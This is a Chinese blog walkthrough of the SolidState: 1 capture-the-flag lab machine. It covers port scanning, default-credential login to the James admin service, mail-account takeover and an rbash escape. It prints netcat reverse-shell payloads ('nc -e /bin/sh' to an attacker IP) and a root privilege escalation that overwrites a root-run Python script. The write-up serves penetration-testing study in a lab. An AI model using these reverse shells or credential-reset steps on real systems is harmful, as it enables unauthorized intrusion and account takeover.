靶机渗透测试(SolidState: 1)

最新推荐文章于 2024-10-11 10:21:00 发布
最新推荐文章于 2024-10-11 10:21:00 发布
阅读量1.2k 收藏 8
点赞数 2
分类专栏: 靶机渗透题解 文章标签: 靶机复现 rbash linux .py文件代码提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46700042/article/details/110137953
版权

靶机渗透测试(SolidState: 1):

Vulnhub靶机 SolidState: 1
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(====)
描述:It was originally created for HackTheBox
flag进度:2/2

渗透流程:

1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)

命令:netdiscover -i eth0 -r 192.168.10.0

靶机ip为: 192.168.10.140
在这里插入图片描述

2. nmap进行靶机端口服务扫描

命令: nmap -sS -Pn -A -p- -n 192.168.10.140

靶机开放22/ssh、 25/smtp、80/http、 110/pop3、119/nntp、4555/james-admin等端口服务

在这里插入图片描述

3. 根据端口服务进行信息收集(80/http端口)

我们访问80页面进行信息收集:查看源代码,御剑,dirb扫描均没有收集到任何有价值的信息,故80页面无果!!!

在这里插入图片描述
在这里插入图片描述

4. 端口服务信息收集(4555/james-admin端口)

开放的4555端口存在远程命令执行漏洞
使用nc命令进行远程连接:

nc 192.168.10.140 4555
输入id=root、password=root

nc的作用:
(1)实现任意TCP/UDP端口的侦听
(2)端口的扫描,nc可以作为client发起TCP或UDP连接
(3)机器之间传输文件
(4)机器之间网络测速

键入help命令查看,发现可以执行listusers(列出用户名),setpassword(重置密码)等操作;
Remote Admin Service(远程管理服务)

在这里插入图片描述
使用listusers命令,发现存在5位用户:

在这里插入图片描述
我们使用setpassword命令将5位用户密码均重置为111;
setpassword 【用户名】 【密码】

在这里插入图片描述
然后使用其他命令进行信息收集,并未从4555端口处发现其他有价值的信息!!!

5. 端口服务信息收集(110/pop3端口)

POP3服务器是遵循POP3协议的接受邮件服务器,用于接收电子邮件
我们使用telnet命令进行远程登陆:

命令:telnet 192.168.10.140 110
Telet是Iteret的远程登录协议,可以通过它远程登录来控制别的计算机

在这里插入图片描述

输入:
user [用户名]
pass [密码]
list(输出文件列)

使用retr命令下载文件
RETR和STOR命令是FTP协议中的下载和上传命令, 可以针对文件和目录
浅谈FTP协议与应用

在这里插入图片描述
在使用retr 2命令后,我们可以看到mindy用户的账号密码!(猜测用于ssh登陆

mindy // P@55W0rd1!2@

在这里插入图片描述
依次登陆5位用户,查看用户目录下的信息,使用retr命令下载文件,并在数据窗口中可以看到指定下载文件的内容.

在110/pop3端口,我们只发现了mindy用户的ssh登陆账号密码,在其他用户下也并没有任何有价值的发现!!!

6. 端口服务信息收集(22/ssh端口)

我们使用mindy用户的账号密码,进行ssh远程连接,但当我们whoami时发现为rbash(受限制的shell),ls发现存在user.txt,cat查看发现一项flag!!!

在这里插入图片描述
双击Tab键,终端会输出当前用户可以执行的命令:

在这里插入图片描述
cat etc/passwd可以看到mindy用户可以利用/bin/rbash/进行反向shell提权;

在这里插入图片描述
rbash(受限的shell),有很多基础的命令都执行不了,我们可以通过下面两种方式进行绕过:

一. exp利用
使用searchsploit搜寻版本漏洞,cp脚本文件下载到kali中:

在这里插入图片描述

我们vi打开py脚本文件,设置payload:

nc -e /bin/sh 192.168.10.9 1234
payload为本地kali的IP地址和nc监听的端口

在这里插入图片描述
执行脚本文件:

命令:
python 35513.py [ip]

在这里插入图片描述
再次使用ssh远程登录,,可以看到脚本文件开始编译执行,我们在kali终端设置nc监听:

在这里插入图片描述

可以看到成功监听,id查看为mindy用户权限;

在这里插入图片描述

二. 一句话绕过
使用一句话命令即可成功绕过:

ssh mindy@192.168.10.140 “export TERM=xterm; python -c 'import pty; pty.spawn(”/bin/sh")’"

在这里插入图片描述

7. 提权操作:

反弹shell成功

根据前面的邮件提示信息,获得ssh的登录凭证是从James那里获取的,所以查看对应用户的进程运行情况:

命令:ps aux | grep james

显示了opt作为根进程,cd进入opt文件夹:

在这里插入图片描述

存在一个Python程序tmp.py程序可以利用,,属于root权限,那么我们将它更改程序执行命令的提权代码:

命令: echo ‘import os; os.system("/bin/nc 192.168.10.9 666 -e /bin/bash")’ > /opt/tmp.py

在这里插入图片描述

反弹shell成功,拿到root权限!!!
实验结束!

在这里插入图片描述

实验总结:

在本次实验中,靶机开放了许多新颖的端口服务,通过端口服务进行信息收集,在4555端口存在远程代码执行,我们在4555端口得到用户名,并重置了用户密码;在pop3服务中,查看到邮件信息,得到下一步ssh的登陆账号密码;

以及在ssh登陆成功后,受限制的rbash绕过是本次实验的特点,我们可以使用一句话绕过,也可以exp绕过;

提权部分为向可执行.py文件中添加可提权的代码,编译执行,成功提权root权限!!!

@小张小张
关注
专栏目录
vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 953
vulnhub-SolidState: 1靶机渗透测试
小白的靶机VulnHub-SolidState
热门推荐
wo41ge的博客
02-18 1万+
靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 开机界面就是这样 拿到靶机的IP地址:192.168.106.151 可以看到的靶机开放了22(ssh)、25(smtp)、80(http)、110(pop3)、119(nntp)、4555(james-admin) 这里有一个漏洞:JAMES Remote Admin 2.3.2存在漏洞 具体可以看这里 那我们就直接去4555端口 因为是Remote Admin Service 所以我们上nc连
Hack the box靶机 SolidState
菜浪马废的博客
05-20 370
有可以用的漏洞 但是需要账户 什么也没有 看一下4555的管理服务 goole一下初始密码 root:root 以为可以ssh了 发现只能pop 给了账号连ssh mindy:P@55W0rd1!2@ 天啊,直接ssh可以查看root.txt 看一眼walkthrough 不太对劲啊 我没提权 重置一下机器 rbash绕过 这才对 找了半天也没啥东西 上les.py找一下 蒙蔽了 一大堆信息 看不过来都 一个有root权限的py脚本 删除/tmp文件的脚本 那直接替换 变蓝了是因为刚才.
渗透测试包括哪些方法?(非常详细),零基础入门到精通,看这一篇就够了
最新发布
分享Python知识
10-11 1145
渗透测试包括哪些方法?(非常详细),零基础入门到精通,看这一篇就够了
vulnhub SolidState: 1
箭雨镜屋
01-18 3043
渗透思路: nmap扫描---->默认账号登录James Remote Admin修改用户密码---->登录pop3端口查看邮件内容找到系统登陆的账户密码---->ssh登录/利用Apache James Server 2.3.2远程命令执行漏洞获得反弹shell----->查找权限777的文件,并用定时任务提权
渗透测试SolidState靶机渗透练习_rbash逃逸+4555端口james服务漏洞
serendipity1130的博客
09-03 805
一、信息收集: arp-scan -l nmap -sS -sV -T5 -p- 192.168.225.190 dirb http://192.168.225.190 //无有效目录 2.根据端口扫描信息,可以看到开放了邮件接收pop3服务,4555端口开放的是james-admin服务,进行远程查看: telnet 192.168.225.190 4555 //使用root root密码进行登录 help //查看指令 listusers //列用户名 setpassword mindy
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 1062
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 926
靶场提权
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
实战打靶集锦-002-SolidState
阿尔泰野狼的博客
01-21 1452
本文记述了博主打靶的心路历程。
No.37-VulnHub-SolidState: 1-Walkthrough渗透学习
qq_34801745的博客
01-31 1055
** VulnHub-SolidState: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/solidstate-1,261/ 靶机难度:中级(CTF) 靶机发布日期:2018年9月12日 靶机描述: 它最初是为HackTheBox创建的 目标:得到root权限&找到flag.txt 作者:大余 时间:2020-01-31 请注意:...
靶场实战(6):OSCP备考之VulnHub SolidState
OneMoreThink
01-03 1056
靶场官网:SolidState: 1[1]实战思路:主机发现 1端口发现(服务、组件、版本) 1漏洞发现(获取权限) 222端口/SSH服务 2组件漏洞 2口令漏洞 325端口/SMTP服务 4组件漏洞 4口令漏洞 44555端口/James-Admin服务 4组件漏洞 4口令漏洞 8110端口/POP3服务 9组件漏洞 9口令漏洞 980端口/HTTP服务 12组件漏洞 12URL漏洞(目录、文...
渗透靶场 Vulnhub:DC-1复现
qq_47168481的博客
09-02 745
渗透靶机DC-1复现过程 下载完靶机后,设置为NAT模式,即可开始测试。 相关过程: 信息搜集 msf的漏洞探测 msf的漏洞利用 提权 信息搜集 1.首先利用nmap探测目标机位置: nmap -A 192.168.178.100/24 获知: 靶机ip地址:192.168.178.141 获取靶机指纹相关信息: 获知: 靶机使用的cms是Drupal 7 漏洞探测: 方法一:利用nmap的脚本探测出漏洞的CVE编号,在msf中查找相关漏洞 方法二:使用msf直接查找网站站点cms漏洞加以利用 方
vulnhub:SolidState
cjstang的博客
06-14 818
OSCP-No.1:SolidState,主要漏洞利用方式:4555端口james服务默认密码漏洞+rbash逃逸提权
靶机渗透练习10-Keyring (HPP漏洞)
Force~
04-02 4908
靶机地址:https://www.vulnhub.com/entry/ia-keyring-101,718/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -sn .
Vulnhub靶机——DOUBLE: 1
qq_51295120的博客
03-18 4079
靶机下载链接在这 VMware和VirtualBox进行互通可参考:Vulnhub靶机——SHENRON: 1 1.主机发现: netdiscover -r 172.16.10.0/24 -i eth0 2. 信息收集: 使用nmap进行全端口服务版本扫描: nmap -n -T5 -p- -sV -sS 172.16.10.212 发现靶机服务器开启了四个端口:22,25,80,8080;其中有80和8080都是http服务 3. 渗透测试 这里有两个超链接:Production和TEST 点击Pr
【甄选靶场】Vulnhub百个项目渗透——项目三十七:SolidState-1(pop3,rbash逃逸,计划任务写入)
人间体佐菲的博客
10-11 775
【甄选靶场】Vulnhub百个项目渗透——项目三十七:SolidState-1(pop3,rbash逃逸,计划任务写入)
HTB-SolidState
qq_42488061的博客
08-29 1071
HTB-SolidState
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值